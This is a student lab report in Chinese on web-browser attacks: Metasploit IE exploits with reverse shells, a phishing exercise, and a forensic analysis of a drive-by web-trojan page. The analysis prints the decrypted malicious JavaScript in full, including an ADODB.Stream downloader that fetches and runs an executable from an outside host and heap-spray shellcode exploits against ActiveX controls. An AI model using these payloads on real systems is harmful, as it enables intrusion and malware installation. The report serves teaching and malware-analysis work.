20232925 2023-2024-2 《网络攻防实践》实践十一报告
1.实践内容
一、web浏览器渗透攻击
利用IE浏览器漏洞,使用攻击机对靶机进行渗透攻击,构造网页木马及实施浏览器攻击,最终拿取shell并执行远程命令。
二、取证分析实践—网页木马攻击场景分析
通过start.html分析得到new09.htm的地址,在new09.htm会得到俩个js脚本信息。
通过对俩个js文件md5散列计算得到新的文件。
继续解密文件最终得到的程序文件进行反汇编查看信息。
三、攻防对抗实践—web浏览器渗透攻击攻防
首先是从攻击方利用Metasploit构造木马,进行浏览器方面漏洞的渗透攻击,并进行混淆处理之后组装成一个URL,通过钓鱼邮件欺骗防守方点击,最终拿去shell。
防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。
2.实践过程
2.1.web浏览器渗透攻击
攻击机Kali(192.168.200.2),靶机(192.168.200.13),首先测试连通性,用Kali来ping靶机,如图一所示。
然后用靶机ping攻击机,如图二。
进入Kali,打开终端进入msfconsole,选择使用Metasploit中的MS06-014渗透攻击模块。如图三。
显示PAYLOAD,选择PAYLOAD为任意远程Shell连接,这里选择了shell_reverse_tcp,如图四。然后设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本。
在靶机上输入上述网址,能连通并在网页显示了一段字符串,如图五。
此时返回到KALI,发现已经建立了会话。在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,然后在靶机上远程执行命令ipconfig查看IP信息,返回结果如图六。
2.2.网页木马攻击场景分析
首先打开start.html文件,发现其中有frame调用了new09.htm如图七。
然后可以打开nwe09.htm文件,发现里有俩个源地址,网页通过iframe调用了http://aa.18dd.net/aa/kl.htm和http://js.users.51.la/1299644.js,如图八所示。
对http://aa.18dd.net/aa/kl.htm进行md5哈希,结果如图九。
同样对http://js.users.51.la/1299644.js进行md5哈希,如图十。
在hashed文件夹中查看哈希文件。发现存在这俩个md5值的文件,如图十一。
如图十二,然后打开这俩个文件,分别是一个脚本文件和记事本文件。可以发现7f60672dcd6b5e90b6772545ee219bd3 文件中有一行t=utf8to16(xxtea_decrypt(base64decode(t), ‘\x73\x63\x72\x69\x70\x74’)),这个是使用了XXTEA进行加密,密钥是"\x73\x63\x72\x69\x70\x74",对应的字符串即script。
进入在线网站,输入7f60672dcd6b5e90b6772545ee219bd3文件内容和密钥,进行解密结果如图十三所示。
输出的结果是以十六进制存在的,继续将十六进制转化为字符串,如图十四。
结果如下所示:
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){};
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){};
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}
分析上述脚本代码,涉及到了“Adodb.Stream”、“MPS.StormPlayer”、“POWERPLAYER.PowerPlayerCtrl.1”和“BaiduBar.Tool”,分别对应利用了微软数据库访问对象、暴风影音、PPStream 和百度搜霸的漏洞,还引用了三个js文件http://aa.18dd.net/aa/1.js、http://aa.18dd.net/aa/b.js、http://aa.18dd.net/aa/pps.js和一个Windows压缩包文件http://down.18dd.net/bb/bd.cab,解压后文件名为bd.exe。
对网址http://aa.18dd.net/aa/1.js计算md5值为5D7E9058A857AA2ABEE820D5473C5FA4,结果如图十五,类似计算其他三个网址md5值分别为3870C28CC279D457746B3796A262F166、5F0B8BF0385314DBE0E5EC95E6ABEDC2、1C1D7B3539A617517C49EEE4120783B2。
依据md5值对应的文件进行分析,首先是http://aa.18dd.net/aa/1.js,内容如图十六。
将其16进制转为字符串:
var url="http://down.18dd.net/bb/014.exe";
try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");
xml.Open("GET",url,0);
xml.Send();
as.type=1;
as.open();
as.write(xml.responseBody);
path="..\\ntuser.com";
as.savetofile(path,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute("cmd.exe","/c "+path,"","open",0)}catch(e){}
http://aa.18dd.net/aa/b.js ,该文件使用了packed加密,解密后有:
var bigblock=unescape("%u9090%u9090");
var headersize=20;
var shellcode=unescape("%uf3e9%u0000"+"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c"+"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378"+"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b"+"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef"+"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1"+"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103"+"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b"+"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e"+"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d"+"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320"+"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344"+"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc"+"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab"+"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f"+"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574"+"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e"+"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00"+"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c"+"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54"+"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");
var slackspace=headersize+shellcode.length;
while(bigblock.length<slackspace)bigblock+=bigblock;
fillblock=bigblock.substring(0,slackspace);
block=bigblock.substring(0,bigblock.length-slackspace);
while(block.length+slackspace<0x40000)block=block+block+fillblock;
memory=new Array();
for(x=0;
x<300;
x++)memory[x]=block+shellcode;
var buffer='';
while(buffer.length<4068)buffer+="\x0a\x0a\x0a\x0a";
storm.rawParse(buffer)
分析解密的代码,首先是利用下载器shellcode下载 http://down.18dd.net/bb/bf.exe 文件。http://aa.18dd.net/aa/pps.js,该文件使用的8进制,进行解密后可以得到:
/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u62
2f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer
发现改代码也是利用下载器shellcode,下载了http://down.18dd.net/bb/pps.exe。
http://down.18dd.net/bb/bd.cab 。可以发现该文件是一个压缩文件,进行解压后,得到一个叫 bd.exe 文件。再将先前的三个文件做 Hash,结果如下所示:
http://down.18dd.net/bb/014.exe%EF%BC%8C32 = ca4e4a1730b0f69a9b94393d9443b979
http://down.18dd.net/bb/bf.exe,32 = 268cbd59fbed235f6cf6b41b92b03f8e
http://down.18dd.net/bb/pps.exe,32 = ff59b3b8961f502289c1b4df8c37e2a4
最终我们获取到四个可执行文件,014.exe,bf.exe,pps.exe,bd.exe。通过对比分析,他们所占磁盘大小相同,且对文件内容MD5 散列计算后结果一致,所以这四个文件的内容数据相同,我们只需要分析其中的任意一个文件即可。
首先我们使用PEiD打开bf.exe,可以发现该程序使用的是Borland Delphi 6.0-7.0版本进行编写,编译版本是win32 GUI,如图十七所示。
然后使用IDA反汇编bf.exe文件,结果如图十八所示。观察一下字符串,可以发现程序从http://down.18dd.net/kl/下载了可执行文件,然后执行脚本文件打开了浏览器,然后还有一些动态库信息和命令cmd /c date 1981-01-12修改系统的日期。
2.3.web浏览器
渗透攻击攻防
攻击方:cx kali 192.168.1.53
防守方:chw winXP 192.168.1.135
搜索IE漏洞,如图十九,配置好攻击载荷后exploit执行。
构造钓鱼邮件发送给好友。如图二十
在防守方点击链接后,查看sessions发现已经建立了一条会话,远程执行命令查看IP信息,结果如图二十一。
攻击方:chw kali 192.168.1.230
防守方:cx w2k 192.168.1.131
攻击者使用了MS14-064漏洞,MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution,主要利用IE浏览器漏洞,Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用Internet Explorer浏览器查看该网站的时允许远程执行代码。
生成一个恶意链接,让用户点击后,用户的ie浏览器会执行操作:访问攻击者指定的ip下载并执行恶意程序,当用户执行恶意程序后,攻击者就能链接到用户的电脑。如图二十二。
追踪抓取的数据流,如图二十三所示。
最终攻击者获取了shell,并执行了dir和IPconfig操作查看信息,如图二十四。
3.学习中遇到的问题及解决
- 问题1:kali变更桥接模式的时候,以太网无法获取连接。
- 问题1解决方案:重置了虚拟网络配置,且尝试热点实现桥接模式。
4.实践总结
通过本次实验,实践了通过web浏览器进行漏洞攻击,IE和火狐作为常用的浏览器也存在这许多漏洞,通过Metasploita构造木马脚本能够直接利用漏洞获取靶机的shell,远程执行命令。所以日常还是要及时更新补丁防止漏洞被利用。其次实验二分析网页木马,学习到了许多加密解密机制来对脚本进行保护,网上有许多在线工具能够提供我们使用。通过实验加强了对web漏洞的认识和解析工具的利用。
1002
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
